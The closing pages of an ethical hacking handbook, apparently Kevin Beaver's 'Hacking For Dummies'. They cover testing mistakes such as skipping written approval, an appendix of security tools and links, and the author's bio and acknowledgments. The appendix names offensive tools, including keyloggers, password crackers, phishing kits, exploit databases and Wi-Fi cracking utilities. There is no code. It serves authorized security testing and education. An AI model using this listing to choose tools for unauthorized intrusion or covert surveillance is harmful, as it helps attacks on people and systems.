Getting documented approval in advance, such as an e-mail, an internal memo, or a formal contract for your ethical hacking efforts—whether it’s from management or from your client—is an absolute must. It’s your “Get Out of Jail Free” card.
Allow no exceptions here—especially when you’re doing work for clients. Make sure you get a signed copy of this document for your files to make sure you’re protected.
Assuming You Can Find All Vulnerabilities During Your Tests
So many security vulnerabilities exist—known and unknown—that you won’t find them all during your testing. Don’t make any guarantees that you’ll find all the security vulnerabilities in a system. You’ll be starting something that you can’t finish.
Stick to the following tenets:
Be realistic.
Use good tools.
Get to know your systems and practice honing your techniques.
I cover each of these in various depths in Chapters 5 through 16.
Assuming You Can Eliminate All Security Vulnerabilities
When it comes to networks, computers, and applications, 100 percent, ironclad security is not attainable. You can’t possibly prevent all security vulnerabilities, but you’ll do fine if you uncover the low-hanging fruit that creates most of the risk and accomplish these tasks:
Follow solid practices—the security essentials that have been around for decades.
Patch and harden your systems.
Apply reasonable security countermeasures where you can based on your budget and your business needs.
Many chapters, such as the operating system chapters in Part IV, cover these areas. It’s also important to remember that you’ll have unplanned costs. You may find lots of security problems and will need the budget to plug the holes. Perhaps you now have a due care problem on your hands and have to fix the issues uncovered. This is why you need to approach information security from a risk perspective and have all the right people on board.
Performing Tests Only Once
Security assessments are a mere snapshot of your overall state of security. New threats and vulnerabilities surface continually, so you must perform these tests periodically and consistently to make sure you keep up with the latest security defenses for your systems. Develop both short- and long-term plans for carrying out your security tests over the next few months and next few years.
Thinking You Know It All
Even though some in the field of IT would beg to differ, no one working in IT or information security knows everything about this subject. Keeping up with all the software versions, hardware models, and emerging technologies, not to mention the associated security threats and vulnerabilities, is impossible. True IT and information security professionals know their limitations—that is, they know what they don’t know. However, they do know where to get answers through the myriad online resources, such as those I’ve listed in the Appendix.
Running Your Tests Without Looking at Things from a Hacker’s Viewpoint
Think about how a malicious outsider or rogue insider can attack your network and computers. Get a fresh perspective and try to think outside the proverbial box about how systems can be taken offline, information can be stolen, and so forth.
Study criminal and hacker behaviors and common hack attacks so you know what to test for. I’m continually blogging about this subject at http://securityonwheels.com/blog. Check out the Appendix for other trusted resources that can help you in this area.
Not Testing the Right Systems
Focus on the systems and information that matter most. You can hack away all day at a standalone desktop running Windows XP or at a training room printer with nothing of value, but does that do any good? Probably not. But you never know. Your biggest risks might be on the seemingly least critical system. Focus on what’s urgent and important.
Not Using the Right Tools
Without the right tools for the task, getting anything done without driving yourself nuts is impossible. It’s no different than working around the house, on your car, or in your garden. Good tools are an absolute must. Download the free and trial-version tools I mention throughout this book and in the Appendix. Buy commercial tools when you can—they’re usually worth every penny. No one security tool does it all, though.
Building your toolbox and getting to know your tools well will save you gobs of effort, you’ll impress others with your results, and you’ll help minimize your business’s risks.
Pounding Production Systems at the Wrong Time
One of the best ways to tick off your manager or lose your client’s trust is to run security tests against production systems when everyone is using them. This is especially true for those running older, more feeble operating systems and applications. If you try to test systems at the wrong time, expect that the critical ones may be negatively impacted at the absolute worst moment. Make sure you know the best time to perform your testing. It might be in the middle of the night. (I never said information security testing was easy!) This might be reason to justify using security tools and other supporting utilities that can help automate certain tasks, such as vulnerability scanners that allow you to run scans at a certain time.
Outsourcing Testing and Not Staying Involved
Outsourcing is great, but you must stay involved throughout the entire process. Don’t hand over the reins of your security testing to a third-party consultant or a managed service provider without following up and staying on top of what’s taking place. You won’t be doing your manager or clients any favors by staying out of the third-party vendors’ hair. Get in their hair, unless of course, it’s a bald person like me. But you know what I mean. You cannot outsource accountability, so stay in touch!
Tools and Resources
To stay up-to-date with the latest and greatest security testing tools and resources, you need to know where to turn. This appendix contains my favorite security sites, tools, resources, and more that you can benefit from in your ongoing security assessment program.
This book’s online Cheat Sheet contains links to all the online tools and resources listed in this appendix. Check it out at www.dummies.com/cheatsheet/hacking.
Advanced Malware
Bit9 + Carbon Black Security Platform — www.bit9.com/solutions
Damballa Failsafe — www.damballa.com/solutions/damballa_failsafe.php
Bluetooth
Blooover — http://trifinite.org/trifinite_stuff_blooover.html
BlueScanner — http://sourceforge.net/projects/bluescanner
Bluesnarfer — www.alighieri.org/tools/bluesnarfer.tar.gz
BlueSniper rifle — www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html
BTScanner for XP — www.pentest.co.uk/src/btscanner_1_0_0.zip
Car Whisperer — http://trifinite.org/trifinite_stuff_carwhisperer.html
Smurf — www.gatefold.co.uk/smurf
Certifications
Certified Ethical Hacker — www.eccouncil.org/CEH.htm
Certified Information Security Manager — www.isaca.org/Certification/CISM-Certified-Information-Security-Manager/Pages/default.aspx
Certified Information Systems Security Professional — www.isc2.org/cissp/default.aspx
Certified Wireless Security Professional — www.cwnp.com/certifications/cwsp
CompTIA Security+ — http://certification.comptia.org/getCertified/certifications/security.aspx
SANS GIAC — www.giac.org
Databases
Advanced Office Password Recovery — www.elcomsoft.com/aopr.html
Advanced SQL Password Recovery — www.elcomsoft.com/asqlpr.html
AppDetectivePro — www.trustwave.com/Products/Database-Security/AppDetectivePRO
ElcomSoft Distributed Password Recovery — www.elcomsoft.com/edpr.html
Idera — www.idera.com
Microsoft SQL Server 2008 Management Studio Express — www.microsoft.com/en-us/download/details.aspx?id=7593
Nexpose — www.rapid7.com/vulnerability-scanner.jsp
Pete Finnigan’s listing of Oracle scanning tools — www.petefinnigan.com/tools.htm
QualysGuard — www.qualys.com
SQLPing3 — www.sqlsecurity.com/downloads
Denial of Service Protection
CloudFlare — www.cloudflare.com
DOSarrest — www.dosarrest.com
Incapsula — www.incapsula.com
Exploits
Metasploit — www.metasploit.com
Offensive Security’s Exploit Database — www.exploit-db.com
Pwnie Express — https://pwnieexpress.com
General Research Tools
AFRINIC — www.afrinic.net
APNIC — www.apnic.net
ARIN — http://whois.arin.net/ui
Bing — www.bing.com
DNSstuff — www.dnsstuff.com
DNSTools — www.dnstools.com
The File Extension Source — http://filext.com
Google — www.google.com
Google advanced operators — www.googleguide.com/advanced_operators.html
Government domains — www.dotgov.gov/portal/web/dotgov/whois
Hoover’s business information — www.hoovers.com
LACNIC — www.lacnic.net
Netcraft’s What’s that site running? — http://netcraft.com
RIPE Network Coordination Centre — https://apps.db.ripe.net/search/query.html
Switchboard.com — www.switchboard.com
theHarvester — https://code.google.com/p/theharvester
United States Patent and Trademark Office — www.uspto.gov
USSearch.com — www.ussearch.com
United States Securities and Exchange Commission — www.sec.gov/edgar.shtml
Whois — www.whois.net
WhatIsMyIP — www.whatismyip.com
Yahoo! Finance — http://finance.yahoo.com
Zabasearch — www.zabasearch.com
Hacker Stuff
2600 The Hacker Quarterly — www.2600.com
Hacker T-shirts, equipment, and other trinkets — www.thinkgeek.com
Hakin9 — http://hakin9.org
(IN)SECURE Magazine — www.net-security.org/insecuremag.php
Phrack — www.phrack.org
The Jargon File — www.jargon.8hz.com
Keyloggers
KeyGhost — www.keyghost.com
SpectorSoft — www.spectorsoft.com
Laws and Regulations
Computer Fraud and Abuse Act — www.fas.org/sgp/crs/misc/RS20830.pdf
Digital Millennium Copyright Act (DMCA) — www.eff.org/issues/dmca
Gramm-Leach-Bliley Act (GLBA) Safeguards Rule — www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act
Health Insurance Portability and Accountability Act (HIPAA) Security Rule — www.hhs.gov/ocr/privacy/hipaa/understanding/srsummary.html
Payment Card Industry Data Security Standard (PCI DSS) — www.pcisecuritystandards.org/security_standards/index.php
United States Security Breach Notification Laws — www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx
LinuxBackTrackLinux—www.backtrack-linux.org
GFILanGuard—www.gfi.com/network-security-vulnerability-scanner
KaliLinux—www.kali.org
LinuxSecurityAuditingTool(LSAT)—http://usat.sourceforge.net
Nexpose—www.rapid7.com/vulnerability-scanner.jsp
QualysGuard—www.qualys.com
THC-Amap—www.thc.org/thc-amap
Tiger—www.nongnu.org/tiger
VarioustoolsatSourceForge—http://sourceforge.net
LiveToolkitsComprehensivelistingoflivebootableLinuxtoolkits—www.livecdlist.com
KaliLinux—www.kali.org
Knoppix—http://knoppix.net
NetworkSecurityToolkit—www.networksecuritytoolkit.org
SecurityToolsDistribution—http://s-t-d.org
LogAnalysisArcSightLogger—www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/index.html
GFIEventsManager—www.gfi.com/eventsmanager

Messaging
Brutus—www.hoobie.net/brutus
Cain & Abel—www.oxid.it/cain.html
DNSstuff relay checker—www.dnsstuff.com
EICAR Anti-Virus test file—www.eicar.org/anti_virus_test_file.htm
GFI e-mail security test—www.gfi.com/pages/email-security.asp
mailsnarf—www.monkey.org/~dugsong/dsniff
theHarvester—https://github.com/laramies/theHarvester
smtpscan—www.freshports.org/security/smtpscan

Miscellaneous
3M Privacy Filters—www.shop3m.com/3m-privacy-filters.html
7-Zip—www.7-zip.org
SmartDraw—www.smartdraw.com
Visio—http://visio.microsoft.com/en-us/preview/default.aspx
WinZip—www.winzip.com

Mobile
BitLocker white papers—www.principlelogic.com/bitlocker.html
Checkmarx CxDeveloper—www.checkmarx.com
ElcomSoft Forensic Disk Decryptor—www.elcomsoft.com/efdd.html
ElcomSoft's Phone Breaker—www.elcomsoft.com/eppb.html
ElcomSoft System Recovery—www.elcomsoft.com/esr.html
iOS Forensic Toolkit—www.elcomsoft.com/eift.html
Ophcrack—http://ophcrack.sourceforge.net
Oxygen Forensic Suite—www.oxygen-forensic.com
Passware Kit Forensic—www.lostpassword.com/kit-forensic.htm
Veracode—www.veracode.com
Microsoft BitLocker Administration and Monitoring—https://technet.microsoft.com/en-us/windows/hh826072.aspx

Networks
Arpwatch—http://linux.maruhn.com/sec/arpwatch.html
Blast—www.mcafee.com/us/downloads/free-tools/blast.aspx
Cain & Abel—www.oxid.it/cain.html
CommView—www.tamos.com/products/commview
dsniff—www.monkey.org/~dugsong/dsniff
Essential NetTools—www.tamos.com/products/nettools
Fortinet—www.fortinet.com
Getif—www.wtcs.org/snmp4tpc/getif.htm
GFI LanGuard—www.gfi.com/network-security-vulnerability-scanner
IKECrack—http://ikecrack.sourceforge.net
MAC address vendor lookup—https://regauth.standards.ieee.org/standards-ra-web/pub/view.html#registries
Nessus vulnerability scanner—www.tenable.com/products/nessus
Netcat—http://netcat.sourceforge.net
netfilter/iptables—www.netfilter.org
NetResident—www.tamos.com/products/netresident
NetScanTools Pro—www.netscantools.com
Nping—https://nmap.org/nping
Nexpose—www.rapid7.com/products/nexpose/compare-downloads.jsp
Nmap port scanner—http://nmap.org
NMapWin—http://sourceforge.net/projects/nmapwin
OmniPeek—www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis
Port list—www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt
Port number lookup—www.cotse.com/cgi-bin/port.cgi
PortSentry—http://sourceforge.net/projects/sentrytools
PromiscDetect—http://ntsecurity.nu/toolbox/promiscdetect
QualysGuard vulnerability scanner—www.qualys.com
SoftPerfect Network Scanner—www.softperfect.com/products/networkscanner
SMAC MAC address changer—www.klcconsulting.net/smac
SNARE—www.intersectalliance.com/projects/Snare
sniffdet—http://sniffdet.sourceforge.net
SonicWALL—www.sonicwall.com
Synful Knock Scanner—http://talosintel.com/scanner
TamoSoft Essential NetTools—www.tamos.com/products/nettools
Traffic IQ Professional—www.idappcom.com
UDPFlood—www.mcafee.com/us/downloads/free-tools/udpflood.aspx
WhatIsMyIP—www.whatismyip.com
Wireshark—www.wireshark.org

Password Cracking
Advanced Archive Password Recovery—www.elcomsoft.com/archpr.html
BIOS passwords—http://labmice.techtarget.com/articles/BIOS_hack.htm
BitLocker security white papers—www.principlelogic.com/bitlocker.html
Brutus—www.hoobie.net/brutus
Cain & Abel—www.oxid.it/cain.html
Crack—ftp://coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack
Default vendor passwords—www.cirt.net/passwords
Dictionary files and word lists:
ftp://ftp.cerias.purdue.edu/pub/dict
https://packetstormsecurity.org/Crackers/wordlists
www.outpost9.com/files/WordLists.html
eBlaster and Spector Pro—www.spectorsoft.com
ElcomSoft Distributed Password Recovery—www.elcomsoft.com/edpr.html
ElcomSoft Forensic Disk Decryptor—www.elcomsoft.com/efdd.html
ElcomSoft System Recovery—www.elcomsoft.com/esr.html
Invisible KeyLogger Stealth—www.amecisco.com/iks.htm
John the Ripper—www.openwall.com/john
KeyGhost—www.keyghost.com
LastPass—https://lastpass.com
NetBIOS Auditing Tool—www.securityfocus.com/tools/543
NIST Guide to Enterprise Password Management—http://csrc.nist.gov/publications/drafts/800-118/draft-sp800-118.pdf
NTAccess—www.mirider.com/ntaccess.html
ophcrack—http://ophcrack.sourceforge.net
Oxygen Forensic Suite—www.oxygen-forensic.com
Pandora—www.nmrc.org/project/pandora
Passware Kit Forensic—www.lostpassword.com/kit-forensic.htm
Password Safe—http://passwordsafe.sourceforge.net
Proactive Password Auditor—www.elcomsoft.com/ppa.html
Proactive System Password Recovery—www.elcomsoft.com/pspr.html
Pwdump3—www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7
RainbowCrack—http://project-rainbowcrack.com
Rainbow tables—http://rainbowtables.shmoo.com
SQLPing3—www.sqlsecurity.com/downloads
THC-Hydra—www.thc.org/thc-hydra
WinHex—www.winhex.com

Patch Management
Debian Linux Security Alerts—www.debian.org/security
Dell KACE Systems Management Appliance—http://software.dell.com/products/kace-k1000-systems-management-appliance/patch-management-security.aspx
Ecora Patch Manager—www.ecora.com/ecora/products/patchmanager.asp
GFI LanGuard—www.gfi.com/network-security-vulnerability-scanner
IBM BigFix—www-03.ibm.com/security/bigfix
KDE Software Updater—https://en.opensuse.org/System_Updates
Lumension Patch and Remediation—www.lumension.com/vulnerability-management/patch-management-software.aspx
ManageEngine—www.manageengine.com/products/desktop-central/linux-management.html
Microsoft Security TechCenter—https://technet.microsoft.com/en-us/security/default.aspx
Shavlik Patch—www.shavlik.com/products/patch
Slackware Linux Security Advisories—www.slackware.com/security
Windows Server Update Services from Microsoft—https://technet.microsoft.com/en-us/windowsserver/bb332157.aspx

Security Education and Learning Resources
Kevin Beaver's information security articles, whitepapers, webcasts, podcasts, and screencasts—www.principlelogic.com/resources.html
Kevin Beaver's Security On Wheels information security audio programs—http://securityonwheels.com
Kevin Beaver's Security On Wheels blog—http://securityonwheels.com/blog
Kevin Beaver's Twitter page—https://twitter.com/kevinbeaver

Security Methods and Models
Open Source Security Testing Methodology Manual—www.isecom.org/research/osstmm.html
OWASP—www.owasp.org
SecurITree—www.amenaza.com
The Open Group's FAIR Risk Taxonomy—www.opengroup.org/subjectareas/security/risk

Social Engineering and Phishing
CheckShortURL—www.checkshorturl.com
LUCY—http://phishing-server.com
Simple Phishing Toolkit—https://github.com/sptoolkit/sptoolkit
Social Engineer Toolkit—www.trustedsec.com/social-engineer-toolkit
Where Does This Link Go?—http://wheredoesthislinkgo.com

Statistics
Privacy Rights Clearinghouse Chronology of Data Breaches—www.privacyrights.org/data-breach
Verizon Data Breach Investigations Report—www.verizonenterprise.com/DBIR

Storage
Effective File Search—www.sowsoft.com/search.htm
FileLocator Pro—www.mythicsoft.com
Identity Finder—www.identityfinder.com

System Hardening
Bastille Linux Hardening Program—http://bastille-linux.sourceforge.net
Center for Internet Security Benchmarks—www.cisecurity.org
Deep Freeze Enterprise—www.faronics.com/products/deep-freeze/enterprise
Fortres 101—www.fortresgrand.com
Imperva—www.imperva.com/products/databasesecurity
Linux Administrator's Security Guide—www.seifried.org/lasg
Microsoft Security Compliance Manager—https://technet.microsoft.com/en-us/library/cc677002.aspx
ServerDefender—www.port80software.com/products/serverdefender
Symantec PGP—www.symantec.com/products-solutions/families/?fid=encryption
WinMagic—www.winmagic.com

User Awareness and Training
Awareity MOAT—www.awareity.com
Dogwood Management Partners Security Posters—www.securityposters.net
Greenidea Visible Statement—www.greenidea.com
Interpact, Inc. Awareness Resources—www.thesecurityawarenesscompany.com
Managing an Information Security and Privacy Awareness and Training Program by Rebecca Herold (Auerbach)—www.amazon.com/Managing-Information-Security-Awareness-Training/dp/0849329639
Peter Davis & Associates training services—www.pdaconsulting.com/services.htm
Security Awareness, Inc.—www.securityawareness.com

Voice over IP
Cain & Abel—www.oxid.it/cain.html
CommView—www.tamos.com/products/commview
Listing of various VoIP tools—www.voipsa.org/Resources/tools.php
NIST's SP 800-58 document—http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf
OmniPeek—www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis
PROTOS—www.ee.oulu.fi/research/ouspg/Protos
VoIP Hopper—http://voiphopper.sourceforge.net
vomit—http://vomit.xtdnet.nl

Vulnerability Databases
Common Vulnerabilities and Exposures—http://cve.mitre.org
CWE/SANS Top 25 Most Dangerous Programming Errors—www.sans.org/top25-software-errors
National Vulnerability Database—http://nvd.nist.gov
SANS Critical Security Controls—www.sans.org/critical-security-controls
US-CERT Vulnerability Notes Database—www.kb.cert.org/vuls

Websites and Applications
Acunetix Web Vulnerability Scanner—www.acunetix.com
AppSpider—www.rapid7.com//products//appspider
Brutus—www.hoobie.net/brutus/index.html
Burp Proxy—https://portswigger.net/burp/proxy.html
Checkmarx CxDeveloper—www.checkmarx.com
Defaced websites—http://zone-h.org/archive
Firefox Web Developer—http://chrispederick.com/work/web-developer
Foundstone's SASS Hacme Tools—www.mcafee.com/us/downloads/free-tools/index.aspx
Google Hack Honeypot—http://ghh.sourceforge.net
Google Hacking Database—www.exploit-db.com/google-hacking-database
HTTrack Website Copier—www.httrack.com
Netsparker—www.netsparker.com
Paros Proxy—http://sourceforge.net/projects/paros
Port80 Software's ServerMask—www.port80software.com/products/servermask
Qualys SSL Labs—www.ssllabs.com
SiteDigger—www.mcafee.com/us/downloads/free-tools/sitedigger.aspx
SQL Inject Me—https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me
SQL Power Injector—www.sqlpowerinjector.com
THC-Hydra—www.thc.org/thc-hydra
Veracode—www.veracode.com
WebGoat—www.owasp.org/index.php/Category:OWASP_WebGoat_Project
WebInspect—www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html
WSDigger—www.mcafee.com/us/downloads/free-tools/wsdigger.aspx
WSFuzzer—www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project

Windows
BitLocker security white papers—www.principlelogic.com/bitlocker.html
DumpSec—www.systemtools.com/somarsoft/?somarsoft.com
GFI LanGuard—www.gfi.com/network-security-vulnerability-scanner
Microsoft Baseline Security Analyzer—https://technet.microsoft.com/en-us/security/cc184924.aspx
Network Users—www.optimumx.com/download/netusers.zip
Nexpose—www.rapid7.com/products/nexpose/compare-downloads.jsp
QualysGuard—www.qualys.com
SoftPerfect Network Scanner—www.softperfect.com/products/networkscanner
Sysinternals—https://technet.microsoft.com/en-us/sysinternals/default.aspx
Winfo—www.ntsecurity.nu/toolbox/winfo

Wireless Networks
Aircrack-ng—http://aircrack-ng.org
AirMagnet WiFi Analyzer—www.flukenetworks.com/enterprise-network/wireless-network/airmagnet-wifi-analyzer
Asleap—http://sourceforge.net/projects/asleap
CommView for WiFi—www.tamos.com/products/commwifi
Digital Hotspotter—www.canarywireless.com
ElcomSoft Wireless Security Auditor—www.elcomsoft.com/ewsa.html
Homebrew WiFi antenna—www.turnpoint.net/wireless/has.html
Kismet—www.kismetwireless.net
NetStumbler—www.netstumbler.com
OmniPeek—www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis
Reaver—https://code.google.com/p/reaver-wps
SuperCantenna—www.cantenna.com
Wellenreiter—http://sourceforge.net/projects/wellenreiter
WEPCrack—http://wepcrack.sourceforge.net
WiFinder—www.boingo.com/retail/#s3781
WiFi Pineapple—www.wifipineapple.com/index.php
WiGLE database of wireless networks—https://wigle.net
WinAirsnort—http://winairsnort.free.fr

About the Author
Kevin Beaver is an independent information security consultant, expert witness, professional speaker, and writer with Atlanta-based Principle Logic, LLC. He has nearly three decades of experience in IT and over 20 years in security. Kevin specializes in performing independent information security assessments for corporations, security product vendors, software developers/cloud service providers, government agencies, and nonprofit organizations. Before starting his information security consulting practice in 2001, Kevin served in various information technology and security roles for several healthcare, e-commerce, financial, and educational institutions.
Kevin has appeared on CNN television as an information security expert and has been quoted in The Wall Street Journal, Entrepreneur, Fortune Small Business, Women's Health, and on Inc. magazine's technology site, IncTechnology.com. Kevin's work has also been referenced by the PCI Council in their Data Security Standard Wireless Guidelines. Kevin has been a top-rated speaker, giving hundreds of presentations and panel discussions for IT and security seminars, conferences, and webcasts over the past decade and a half.
Kevin has authored or co-authored 12 information security books, including Hacking Wireless Networks For Dummies, Implementation Strategies for Fulfilling and Maintaining IT Compliance (Realtimepublishers.com), and The Practical Guide to HIPAA Privacy and Security Compliance (Auerbach). Kevin has written more than three dozen whitepapers and over 900 articles and guest blog posts for sites such as TechTarget's SearchSecurity.com, Ziff Davis' Toolbox.com, and IBM's SecurityIntelligence.com. Kevin is the creator and producer of the Security On Wheels audiobooks, which provide security learning for IT professionals on the go (securityonwheels.com), and the Security On Wheels blog (securityonwheels.com/blog). He also covers information security and related matters on Twitter (@kevinbeaver) and YouTube (PrincipleLogic). Kevin earned his bachelor's degree in Computer Engineering Technology from Southern College of Technology and his master's degree in Management of Technology from Georgia Tech. He obtained his CISSP certification in 2001 and also holds MCSE, Master CNE, and IT Project+ certifications.
Kevin can be reached through his website, www.principlelogic.com, and you can connect to him via LinkedIn at www.linkedin.com/in/kevinbeaver.

Dedication
Dad, this one's for you. I wouldn't be here today without your guidance and support. You've taught me so much about common sense—its absence in much of the world and how important it is for being successful no matter what the endeavor. I love you very much.

Author's Acknowledgments
I want to thank Amy, Garrett, and Mary Lin for your loving ways, funny jokes, and willingness to deal with my nonsense day in and day out, especially since I've been working on the updates to this edition! I still love each of you 100 percent!
I'd also like to thank Amy Fandrei, my acquisitions editor, for continuing this project and presenting me the opportunity to shape this book into something I'm very proud of. I'd like to thank my project editor, Katharine Dvorak. You've been very patient and great to work with! I'm looking forward to working with you again in the future. Also, many thanks to my technical editor, business colleague, friend, and co-author of Hacking Wireless Networks For Dummies, Peter T. Davis. I'm honored (as always) to be working with you and very much appreciate your feedback on this edition! I also want to extend a sincere thanks to Richard Stiennon—I'm flattered that such a strong leader in my field was willing to write the Foreword to this book.
Much gratitude to Robert Abela with Netsparker; Nate Crampton, Ryan Poppa, Alan Lipton, HD Moore, Justin Warren, and Dan Kuykendall with Rapid7; Vladimir Katalov and Olga Koksharova with ElcomSoft; Cristian Florian with GFI Software; Maty Siman and Asaph Schulman with Checkmarx; Dmitry Sumin with Passware; Kirk Thomas with Northwest Performance Software; David Vest with Mythicsoft; Michael Berg with TamoSoft; Terry Ingoldsby with Amenaza Technologies; and Oleg Fedorov with Oxygen Software Company for responding to all of my requests. Continued thanks to Dave Coe for your help in keeping me current on the latest security tools and hacks! Much gratitude to all the others I forgot to mention as well.
Mega thanks to Rush and Dream Theater for your inspirational words and driving sounds to get me through the not-feeling-creative times working on this edition!
Finally, I want to express my sincere appreciation to my clients for continuing to hire me, the "no-name-brand" consultant who works for himself, and keeping me around for the long term. I wouldn't be here without your willingness to break out of the "must hire big company" mindset and your continued support. Thank you very much!

Publisher's Acknowledgments
Acquisitions Editor: Amy Fandrei
Project Editor: Katharine Dvorak
Technical Editor: Peter T. Davis
Sr. Editorial Assistant: Cherie Case
Production Editor: Kinson Raja
Cover Image: Denis Vrublevski/Shutterstock